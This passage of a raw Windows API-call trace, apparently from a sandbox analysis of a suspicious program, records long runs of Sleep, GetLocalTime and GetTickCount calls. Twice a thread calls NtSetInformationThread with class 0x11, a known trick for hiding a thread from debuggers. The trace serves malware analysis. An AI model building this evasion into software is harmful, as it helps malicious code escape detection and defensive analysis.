(dwMilliseconds=0x3e8) [0187.472] Sleep (dwMilliseconds=0x3e8) [0187.560] Sleep (dwMilliseconds=0x3e8) [0187.655] Sleep (dwMilliseconds=0x3e8) [0187.778] Sleep (dwMilliseconds=0x3e8) [0187.887] GetLocalTime (in: lpSystemTime=0x382ff4c | out: lpSystemTime=0x382ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x17, wMilliseconds=0x2ce)) [0187.887] Sleep (dwMilliseconds=0x3e8) [0188.017] Sleep (dwMilliseconds=0x3e8) [0188.121] Sleep (dwMilliseconds=0x3e8) [0188.230] Sleep (dwMilliseconds=0x3e8) [0188.364] Sleep (dwMilliseconds=0x3e8) [0188.558] Sleep (dwMilliseconds=0x3e8) [0188.698] Sleep (dwMilliseconds=0x3e8) [0188.838] Sleep (dwMilliseconds=0x3e8) [0189.041] Sleep (dwMilliseconds=0x3e8) [0189.152] Sleep (dwMilliseconds=0x3e8) [0189.244] Sleep (dwMilliseconds=0x3e8) [0189.338] Sleep (dwMilliseconds=0x3e8) [0189.431] Sleep (dwMilliseconds=0x3e8) [0189.526] Sleep (dwMilliseconds=0x3e8) [0189.619] Sleep (dwMilliseconds=0x3e8) [0189.711] Sleep (dwMilliseconds=0x3e8) [0189.837] Sleep (dwMilliseconds=0x3e8) [0189.959] Sleep (dwMilliseconds=0x3e8) [0190.039] Sleep (dwMilliseconds=0x3e8) [0190.165] Sleep (dwMilliseconds=0x3e8) [0190.273] Sleep (dwMilliseconds=0x3e8) [0190.367] Sleep (dwMilliseconds=0x3e8) [0190.461] Sleep (dwMilliseconds=0x3e8) [0190.569] Sleep (dwMilliseconds=0x3e8) [0190.712] Sleep (dwMilliseconds=0x3e8) [0190.804] Sleep (dwMilliseconds=0x3e8) [0190.898] Sleep (dwMilliseconds=0x3e8) [0191.007] Sleep (dwMilliseconds=0x3e8) [0191.231] Sleep (dwMilliseconds=0x3e8) [0191.322] Sleep (dwMilliseconds=0x3e8) [0191.370] Sleep (dwMilliseconds=0x3e8) [0191.417] Sleep (dwMilliseconds=0x3e8) [0191.462] Sleep (dwMilliseconds=0x3e8) [0191.510] Sleep (dwMilliseconds=0x3e8) [0191.553] Sleep (dwMilliseconds=0x3e8) [0191.600] Sleep (dwMilliseconds=0x3e8) [0191.647] Sleep (dwMilliseconds=0x3e8) [0191.694] Sleep (dwMilliseconds=0x3e8) [0191.740] Sleep (dwMilliseconds=0x3e8) [0191.787] Sleep (dwMilliseconds=0x3e8) [0191.834] Sleep (dwMilliseconds=0x3e8) [0191.881] Sleep (dwMilliseconds=0x3e8) [0191.927] Sleep (dwMilliseconds=0x3e8) [0191.974] Sleep (dwMilliseconds=0x3e8) [0192.042] Sleep (dwMilliseconds=0x3e8) [0192.182] Sleep (dwMilliseconds=0x3e8) [0192.265] Sleep (dwMilliseconds=0x3e8) [0192.306] Sleep (dwMilliseconds=0x3e8) [0192.353] Sleep (dwMilliseconds=0x3e8) [0192.396] Sleep (dwMilliseconds=0x3e8) [0192.442] Sleep (dwMilliseconds=0x3e8) [0192.489] Sleep (dwMilliseconds=0x3e8) [0192.536] Sleep (dwMilliseconds=0x3e8) [0192.583] Sleep (dwMilliseconds=0x3e8) [0192.723] Sleep (dwMilliseconds=0x3e8) [0192.770] Sleep (dwMilliseconds=0x3e8) [0192.818] Sleep (dwMilliseconds=0x3e8) [0192.863] Sleep (dwMilliseconds=0x3e8) [0192.912] Sleep (dwMilliseconds=0x3e8) [0192.957] Sleep (dwMilliseconds=0x3e8) [0193.017] GetLocalTime (in: lpSystemTime=0x382ff4c | out: lpSystemTime=0x382ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1c, wMilliseconds=0x342)) [0193.017] Sleep (dwMilliseconds=0x3e8) [0193.066] Sleep (dwMilliseconds=0x3e8) [0193.129] Sleep (dwMilliseconds=0x3e8) [0193.175] Sleep (dwMilliseconds=0x3e8) [0193.198] Sleep (dwMilliseconds=0x3e8) [0193.209] Sleep (dwMilliseconds=0x3e8) [0193.253] Sleep (dwMilliseconds=0x3e8) [0193.347] Sleep (dwMilliseconds=0x3e8) [0193.441] Sleep (dwMilliseconds=0x3e8) [0193.535] Sleep (dwMilliseconds=0x3e8) [0193.660] Sleep (dwMilliseconds=0x3e8) [0193.701] Sleep (dwMilliseconds=0x3e8) [0193.754] Sleep (dwMilliseconds=0x3e8) [0193.863] Sleep (dwMilliseconds=0x3e8) [0193.940] Sleep (dwMilliseconds=0x3e8) [0194.034] Sleep (dwMilliseconds=0x3e8) [0194.208] Sleep (dwMilliseconds=0x3e8) [0194.319] Sleep (dwMilliseconds=0x3e8) [0194.409] Sleep (dwMilliseconds=0x3e8) [0194.487] Sleep (dwMilliseconds=0x3e8) [0194.580] Sleep (dwMilliseconds=0x3e8) [0194.661] Sleep (dwMilliseconds=0x3e8) [0194.837] Sleep (dwMilliseconds=0x3e8) [0194.879] Sleep (dwMilliseconds=0x3e8) [0195.001] Sleep (dwMilliseconds=0x3e8) [0195.157] Sleep (dwMilliseconds=0x3e8) [0195.268] Sleep (dwMilliseconds=0x3e8) [0195.391] Sleep (dwMilliseconds=0x3e8) [0195.441] Sleep (dwMilliseconds=0x3e8) [0195.532] Sleep (dwMilliseconds=0x3e8) [0195.623] Sleep (dwMilliseconds=0x3e8) [0195.677] Sleep (dwMilliseconds=0x3e8) [0195.737] Sleep (dwMilliseconds=0x3e8) [0195.838] Sleep (dwMilliseconds=0x3e8) [0195.927] Sleep (dwMilliseconds=0x3e8) [0196.002] Sleep (dwMilliseconds=0x3e8) [0196.219] Sleep (dwMilliseconds=0x3e8) [0196.271] Sleep (dwMilliseconds=0x3e8) [0196.359] Sleep (dwMilliseconds=0x3e8) [0196.571] Sleep (dwMilliseconds=0x3e8) [0196.624] Sleep (dwMilliseconds=0x3e8) [0196.687] Sleep (dwMilliseconds=0x3e8) [0196.758] Sleep (dwMilliseconds=0x3e8) [0196.864] Sleep (dwMilliseconds=0x3e8) [0196.929] Sleep (dwMilliseconds=0x3e8) [0196.998] Sleep (dwMilliseconds=0x3e8) [0197.062] Sleep (dwMilliseconds=0x3e8) [0197.203] Sleep (dwMilliseconds=0x3e8) [0197.265] Sleep (dwMilliseconds=0x3e8) [0197.360] Sleep (dwMilliseconds=0x3e8) [0197.451] Sleep (dwMilliseconds=0x3e8) [0197.550] Sleep (dwMilliseconds=0x3e8) [0197.652] Sleep (dwMilliseconds=0x3e8) [0197.717] Sleep (dwMilliseconds=0x3e8) [0197.846] Sleep (dwMilliseconds=0x3e8) [0197.964] Sleep (dwMilliseconds=0x3e8) [0198.054] Sleep (dwMilliseconds=0x3e8) [0198.328] Sleep (dwMilliseconds=0x3e8) [0198.420] Sleep (dwMilliseconds=0x3e8) [0198.469] Sleep (dwMilliseconds=0x3e8) [0198.483] GetLocalTime (in: lpSystemTime=0x382ff4c | out: lpSystemTime=0x382ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x136)) [0198.483] Sleep (dwMilliseconds=0x3e8) [0198.508] Sleep (dwMilliseconds=0x3e8) [0198.514] Sleep (dwMilliseconds=0x3e8) [0198.542] Sleep (dwMilliseconds=0x3e8) [0198.590] Sleep (dwMilliseconds=0x3e8) [0198.641] Sleep (dwMilliseconds=0x3e8) [0198.649] Sleep (dwMilliseconds=0x3e8) [0198.656] Sleep (dwMilliseconds=0x3e8) [0198.660] Sleep (dwMilliseconds=0x3e8) [0198.670] Sleep (dwMilliseconds=0x3e8) [0198.678] Sleep (dwMilliseconds=0x3e8) [0198.680] Sleep (dwMilliseconds=0x3e8) [0198.683] Sleep (dwMilliseconds=0x3e8) [0198.685] Sleep (dwMilliseconds=0x3e8) [0198.687] Sleep (dwMilliseconds=0x3e8) [0198.694] Sleep (dwMilliseconds=0x3e8) [0198.697] Sleep (dwMilliseconds=0x3e8) [0198.701] Sleep (dwMilliseconds=0x3e8) [0198.702] Sleep (dwMilliseconds=0x3e8) [0198.707] Sleep (dwMilliseconds=0x3e8) [0198.708] Sleep (dwMilliseconds=0x3e8) [0198.710] Sleep (dwMilliseconds=0x3e8) [0198.712] Sleep (dwMilliseconds=0x3e8) [0198.714] Sleep (dwMilliseconds=0x3e8) [0198.718] Sleep (dwMilliseconds=0x3e8) [0198.723] Sleep (dwMilliseconds=0x3e8) [0198.729] Sleep (dwMilliseconds=0x3e8) [0198.733] Sleep (dwMilliseconds=0x3e8) [0198.739] Sleep (dwMilliseconds=0x3e8) [0198.740] Sleep (dwMilliseconds=0x3e8) [0198.742] Sleep (dwMilliseconds=0x3e8) [0198.744] Sleep (dwMilliseconds=0x3e8) [0198.748] Sleep (dwMilliseconds=0x3e8) [0198.750] Sleep (dwMilliseconds=0x3e8) [0198.753] Sleep (dwMilliseconds=0x3e8) [0198.761] Sleep (dwMilliseconds=0x3e8) [0198.762] Sleep (dwMilliseconds=0x3e8) [0198.770] Sleep (dwMilliseconds=0x3e8) [0198.771] Sleep (dwMilliseconds=0x3e8) [0198.773] Sleep (dwMilliseconds=0x3e8) [0198.776] Sleep (dwMilliseconds=0x3e8) [0198.777] Sleep (dwMilliseconds=0x3e8) [0198.779] Sleep (dwMilliseconds=0x3e8) [0198.781] Sleep (dwMilliseconds=0x3e8) [0198.782] Sleep (dwMilliseconds=0x3e8) [0198.790] Sleep (dwMilliseconds=0x3e8) [0198.791] Sleep (dwMilliseconds=0x3e8) [0198.793] Sleep (dwMilliseconds=0x3e8) [0198.802] Sleep (dwMilliseconds=0x3e8) [0198.804] Sleep (dwMilliseconds=0x3e8) [0198.806] Sleep (dwMilliseconds=0x3e8) [0198.809] Sleep (dwMilliseconds=0x3e8) [0198.810] Sleep (dwMilliseconds=0x3e8) [0198.812] Sleep (dwMilliseconds=0x3e8) [0198.814] Sleep (dwMilliseconds=0x3e8) [0198.823] Sleep (dwMilliseconds=0x3e8) [0198.826] Sleep (dwMilliseconds=0x3e8) [0198.830] Sleep (dwMilliseconds=0x3e8) [0198.833] Sleep (dwMilliseconds=0x3e8) [0198.836] Sleep (dwMilliseconds=0x3e8) [0198.838] GetLocalTime (in: lpSystemTime=0x382ff4c | out: lpSystemTime=0x382ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x29d)) [0198.838] Sleep (dwMilliseconds=0x3e8) [0198.842] Sleep (dwMilliseconds=0x3e8) [0198.844] Sleep (dwMilliseconds=0x3e8) [0198.850] Sleep (dwMilliseconds=0x3e8) [0198.851] Sleep (dwMilliseconds=0x3e8) [0198.859] Sleep (dwMilliseconds=0x3e8) [0198.862] Sleep (dwMilliseconds=0x3e8) [0198.865] Sleep (dwMilliseconds=0x3e8) [0198.872] Sleep (dwMilliseconds=0x3e8) [0198.874] Sleep (dwMilliseconds=0x3e8) [0198.876] Sleep (dwMilliseconds=0x3e8) [0198.881] Sleep (dwMilliseconds=0x3e8) [0198.883] Sleep (dwMilliseconds=0x3e8) [0198.885] Sleep (dwMilliseconds=0x3e8) [0198.887] Sleep (dwMilliseconds=0x3e8) [0198.892] Sleep (dwMilliseconds=0x3e8) [0198.894] Sleep (dwMilliseconds=0x3e8) [0198.895] Sleep (dwMilliseconds=0x3e8) [0198.904] Sleep (dwMilliseconds=0x3e8) [0198.907] Sleep (dwMilliseconds=0x3e8) [0198.912] Sleep (dwMilliseconds=0x3e8) [0198.914] Sleep (dwMilliseconds=0x3e8) [0198.916] Sleep (dwMilliseconds=0x3e8) [0198.919] Sleep (dwMilliseconds=0x3e8) [0198.921] Sleep (dwMilliseconds=0x3e8) [0198.924] Sleep (dwMilliseconds=0x3e8) [0198.932] Sleep (dwMilliseconds=0x3e8) [0198.935] Sleep (dwMilliseconds=0x3e8) [0198.941] Sleep (dwMilliseconds=0x3e8) [0198.943] Sleep (dwMilliseconds=0x3e8) [0198.945] Sleep (dwMilliseconds=0x3e8) [0198.950] Sleep (dwMilliseconds=0x3e8) [0198.953] Sleep (dwMilliseconds=0x3e8) [0198.955] Sleep (dwMilliseconds=0x3e8) [0198.960] Sleep (dwMilliseconds=0x3e8) [0198.962] Sleep (dwMilliseconds=0x3e8) [0198.964] Sleep (dwMilliseconds=0x3e8) [0198.973] Sleep (dwMilliseconds=0x3e8) [0198.975] Sleep (dwMilliseconds=0x3e8) [0198.977] Sleep (dwMilliseconds=0x3e8) [0198.983] Sleep (dwMilliseconds=0x3e8) [0198.985] Sleep (dwMilliseconds=0x3e8) [0198.987] Sleep (dwMilliseconds=0x3e8) [0198.990] Sleep (dwMilliseconds=0x3e8) [0198.992] Sleep (dwMilliseconds=0x3e8) [0198.996] Sleep (dwMilliseconds=0x3e8) [0199.002] Sleep (dwMilliseconds=0x3e8) [0199.005] Sleep (dwMilliseconds=0x3e8) [0199.007] Sleep (dwMilliseconds=0x3e8) [0199.010] Sleep (dwMilliseconds=0x3e8) [0199.013] Sleep (dwMilliseconds=0x3e8) [0199.015] Sleep (dwMilliseconds=0x3e8) [0199.017] Sleep (dwMilliseconds=0x3e8) [0199.022] Sleep (dwMilliseconds=0x3e8) [0199.024] Sleep (dwMilliseconds=0x3e8) [0199.028] Sleep (dwMilliseconds=0x3e8) [0199.031] Sleep (dwMilliseconds=0x3e8) [0199.034] Sleep (dwMilliseconds=0x3e8) [0199.036] Sleep (dwMilliseconds=0x3e8) [0199.038] Sleep (dwMilliseconds=0x3e8) [0199.044] GetLocalTime (in: lpSystemTime=0x382ff4c | out: lpSystemTime=0x382ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x36b)) [0199.044] Sleep (dwMilliseconds=0x3e8) [0199.046] Sleep (dwMilliseconds=0x3e8) [0199.052] Sleep (dwMilliseconds=0x3e8) [0199.055] Sleep (dwMilliseconds=0x3e8) [0199.057] Sleep (dwMilliseconds=0x3e8) [0199.065] Sleep (dwMilliseconds=0x3e8) [0199.066] Sleep (dwMilliseconds=0x3e8) [0199.071] Sleep (dwMilliseconds=0x3e8) [0199.163] Sleep (dwMilliseconds=0x3e8) [0199.214] Sleep (dwMilliseconds=0x3e8) [0199.269] Sleep (dwMilliseconds=0x3e8) [0199.273] Sleep (dwMilliseconds=0x3e8) [0199.275] Sleep (dwMilliseconds=0x3e8) [0199.276] Sleep (dwMilliseconds=0x3e8) [0199.278] Sleep (dwMilliseconds=0x3e8) [0199.285] Sleep (dwMilliseconds=0x3e8) [0199.287] Sleep (dwMilliseconds=0x3e8) [0199.291] Sleep (dwMilliseconds=0x3e8) [0199.294] Sleep (dwMilliseconds=0x3e8) [0199.296] Sleep (dwMilliseconds=0x3e8) [0199.298] Sleep (dwMilliseconds=0x3e8) [0199.300] Sleep (dwMilliseconds=0x3e8) [0199.301] Sleep (dwMilliseconds=0x3e8) [0199.304] Sleep (dwMilliseconds=0x3e8) [0199.305] Sleep (dwMilliseconds=0x3e8) [0199.308] Sleep (dwMilliseconds=0x3e8) [0199.313] Sleep (dwMilliseconds=0x3e8) [0199.316] Sleep (dwMilliseconds=0x3e8) [0199.318] Sleep (dwMilliseconds=0x3e8) [0199.320] Sleep (dwMilliseconds=0x3e8) [0199.324] Sleep (dwMilliseconds=0x3e8) [0199.326] Sleep (dwMilliseconds=0x3e8) [0199.328] Sleep (dwMilliseconds=0x3e8) [0199.330] Sleep (dwMilliseconds=0x3e8) [0199.332] Sleep (dwMilliseconds=0x3e8) [0199.335] Sleep (dwMilliseconds=0x3e8) [0199.338] Sleep (dwMilliseconds=0x3e8) [0199.343] Sleep (dwMilliseconds=0x3e8) [0199.481] Sleep (dwMilliseconds=0x3e8) [0199.534] Sleep (dwMilliseconds=0x3e8) [0199.540] Sleep (dwMilliseconds=0x3e8) [0199.541] Sleep (dwMilliseconds=0x3e8) [0199.543] Sleep (dwMilliseconds=0x3e8) [0199.544] Sleep (dwMilliseconds=0x3e8) [0199.547] Sleep (dwMilliseconds=0x3e8) [0199.549] Sleep (dwMilliseconds=0x3e8) [0199.552] Sleep (dwMilliseconds=0x3e8) [0199.556] Sleep (dwMilliseconds=0x3e8) [0199.560] Sleep (dwMilliseconds=0x3e8) [0199.562] Sleep (dwMilliseconds=0x3e8) [0199.565] Sleep (dwMilliseconds=0x3e8) [0199.569] Sleep (dwMilliseconds=0x3e8) [0199.572] Sleep (dwMilliseconds=0x3e8) [0199.574] Sleep (dwMilliseconds=0x3e8) [0199.576] Sleep (dwMilliseconds=0x3e8) [0199.579] Sleep (dwMilliseconds=0x3e8) [0199.583] Sleep (dwMilliseconds=0x3e8) [0199.586] Sleep (dwMilliseconds=0x3e8) [0199.591] Sleep (dwMilliseconds=0x3e8) [0199.593] Sleep (dwMilliseconds=0x3e8) [0199.594] GetLocalTime (in: lpSystemTime=0x382ff4c | out: lpSystemTime=0x382ff4c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x23, wMilliseconds=0x1a0)) [0199.594] Sleep (dwMilliseconds=0x3e8) [0199.596] Sleep (dwMilliseconds=0x3e8) [0199.601] Sleep (dwMilliseconds=0x3e8) [0199.602] Sleep (dwMilliseconds=0x3e8) [0199.604] Sleep (dwMilliseconds=0x3e8) [0199.605] Sleep (dwMilliseconds=0x3e8) [0199.609] Sleep (dwMilliseconds=0x3e8) [0199.616] Sleep (dwMilliseconds=0x3e8) [0199.619] Sleep (dwMilliseconds=0x3e8) [0199.620] Sleep (dwMilliseconds=0x3e8) [0199.622] Sleep (dwMilliseconds=0x3e8) [0199.623] Sleep (dwMilliseconds=0x3e8) [0199.625] Sleep (dwMilliseconds=0x3e8) [0199.626] Sleep (dwMilliseconds=0x3e8) [0199.671] Sleep (dwMilliseconds=0x3e8) [0199.673] Sleep (dwMilliseconds=0x3e8) [0199.676] Sleep (dwMilliseconds=0x3e8) [0199.684] Sleep (dwMilliseconds=0x3e8) [0199.686] Sleep (dwMilliseconds=0x3e8) [0199.687] Sleep (dwMilliseconds=0x3e8) [0199.693] Sleep (dwMilliseconds=0x3e8) [0199.735] Sleep (dwMilliseconds=0x3e8) [0199.746] Sleep (dwMilliseconds=0x3e8) [0199.751] Sleep (dwMilliseconds=0x3e8) [0199.768] Sleep (dwMilliseconds=0x3e8) [0199.772] Sleep (dwMilliseconds=0x3e8) [0199.783] Sleep (dwMilliseconds=0x3e8) [0199.801] Sleep (dwMilliseconds=0x3e8) [0199.812] Sleep (dwMilliseconds=0x3e8) [0199.826] Sleep (dwMilliseconds=0x3e8) [0199.840] Sleep (dwMilliseconds=0x3e8) [0199.856] Sleep (dwMilliseconds=0x3e8) [0199.934] Sleep (dwMilliseconds=0x3e8) [0200.005] Sleep (dwMilliseconds=0x3e8) [0200.043] Sleep (dwMilliseconds=0x3e8) [0200.184] Sleep (dwMilliseconds=0x3e8) [0200.280] Sleep (dwMilliseconds=0x3e8) [0200.371] Sleep (dwMilliseconds=0x3e8) [0200.490] Sleep (dwMilliseconds=0x3e8) [0200.576] Sleep (dwMilliseconds=0x3e8) [0200.668] Sleep (dwMilliseconds=0x3e8) [0200.779] Sleep (dwMilliseconds=0x3e8) [0200.871] Sleep (dwMilliseconds=0x3e8) [0200.991] Sleep (dwMilliseconds=0x3e8) [0201.074] Sleep (dwMilliseconds=0x3e8) [0201.231] Sleep (dwMilliseconds=0x3e8) [0201.404] Sleep (dwMilliseconds=0x3e8) [0201.509] Sleep (dwMilliseconds=0x3e8) [0201.603] Sleep (dwMilliseconds=0x3e8) [0201.696] Sleep (dwMilliseconds=0x3e8) [0201.806] Sleep (dwMilliseconds=0x3e8) [0201.915] Sleep (dwMilliseconds=0x3e8) [0202.009] Sleep (dwMilliseconds=0x3e8) [0202.075] Sleep (dwMilliseconds=0x3e8) [0202.231] Sleep (dwMilliseconds=0x3e8) [0202.318] Sleep (dwMilliseconds=0x3e8) Thread: id = 58 os_tid = 0xff0 [0133.818] GetCurrentThreadId () returned 0xff0 [0133.818] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x26, wMilliseconds=0x1ce)) [0133.818] GetTickCount () returned 0x1d0a8f4 [0133.818] Sleep (dwMilliseconds=0x3e8) [0135.424] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x27, wMilliseconds=0x278)) [0135.424] GetTickCount () returned 0x1d0ad86 [0135.424] Sleep (dwMilliseconds=0x3e8) [0136.611] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x28, wMilliseconds=0x2e4)) [0136.611] GetTickCount () returned 0x1d0b1da [0136.611] Sleep (dwMilliseconds=0x3e8) [0137.838] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x29, wMilliseconds=0x35f)) [0137.839] GetTickCount () returned 0x1d0b63d [0137.839] Sleep (dwMilliseconds=0x3e8) [0139.065] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x2b, wMilliseconds=0x11)) [0139.065] GetTickCount () returned 0x1d0babf [0139.065] Sleep (dwMilliseconds=0x3e8) [0140.191] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x2c, wMilliseconds=0x8c)) [0140.191] GetTickCount () returned 0x1d0bf23 [0140.191] Sleep (dwMilliseconds=0x3e8) [0141.216] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x2d, wMilliseconds=0xaa)) [0141.218] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0141.218] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0141.218] GetCurrentThread () returned 0xfffffffe [0141.219] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0141.219] GetTickCount () returned 0x1d0c328 [0141.219] Sleep (dwMilliseconds=0x3e8) [0142.246] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x2e, wMilliseconds=0xc8)) [0142.247] GetTickCount () returned 0x1d0c72e [0142.247] Sleep (dwMilliseconds=0x3e8) [0143.303] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x2f, wMilliseconds=0x104)) [0143.303] GetTickCount () returned 0x1d0cb53 [0143.303] Sleep (dwMilliseconds=0x3e8) [0144.394] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x30, wMilliseconds=0x160)) [0144.394] GetTickCount () returned 0x1d0cf97 [0144.394] Sleep (dwMilliseconds=0x3e8) [0145.553] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x31, wMilliseconds=0x19d)) [0145.553] GetTickCount () returned 0x1d0d3bc [0145.553] Sleep (dwMilliseconds=0x3e8) [0146.736] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x32, wMilliseconds=0x1ea)) [0146.737] GetTickCount () returned 0x1d0d7f0 [0146.737] Sleep (dwMilliseconds=0x3e8) [0147.752] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x33, wMilliseconds=0x1f8)) [0147.752] GetTickCount () returned 0x1d0dbe6 [0147.752] Sleep (dwMilliseconds=0x3e8) [0148.841] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x34, wMilliseconds=0x254)) [0148.841] GetTickCount () returned 0x1d0e02a [0148.841] Sleep (dwMilliseconds=0x3e8) [0149.935] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x35, wMilliseconds=0x2b0)) [0149.935] GetTickCount () returned 0x1d0e46e [0149.935] Sleep (dwMilliseconds=0x3e8) [0151.279] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x36, wMilliseconds=0x2cd)) [0151.279] GetTickCount () returned 0x1d0e874 [0151.279] Sleep (dwMilliseconds=0x3e8) [0154.197] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x37, wMilliseconds=0x2eb)) [0154.198] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0154.198] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0154.198] GetCurrentThread () returned 0xfffffffe [0154.198] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0154.199] GetTickCount () returned 0x1d0ec79 [0154.199] Sleep (dwMilliseconds=0x3e8) [0157.777] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x39, wMilliseconds=0x1a)) [0163.398] GetTickCount () returned 0x1d0fa20 [0163.398] Sleep (dwMilliseconds=0x3e8) [0164.429] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x0, wMilliseconds=0x10f)) [0164.430] GetTickCount () returned 0x1d0fe25 [0164.430] Sleep (dwMilliseconds=0x3e8) [0165.474] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x1, wMilliseconds=0x13c)) [0165.474] GetTickCount () returned 0x1d1023a [0165.474] Sleep (dwMilliseconds=0x3e8) [0166.586] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x2, wMilliseconds=0x1a8)) [0166.586] GetTickCount () returned 0x1d1068e [0166.586] Sleep (dwMilliseconds=0x3e8) [0166.814] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x2, wMilliseconds=0x292)) [0166.814] GetTickCount () returned 0x1d10b5f [0166.814] Sleep (dwMilliseconds=0x3e8) [0166.924] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: lpSystemTime=0x3a2ff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x2, wMilliseconds=0x2ff)) [0166.924] GetTickCount () returned 0x1d10fb3 [0166.924] Sleep (dwMilliseconds=0x3e8) [0167.027] GetLocalTime (in: lpSystemTime=0x3a2ff0c | out: 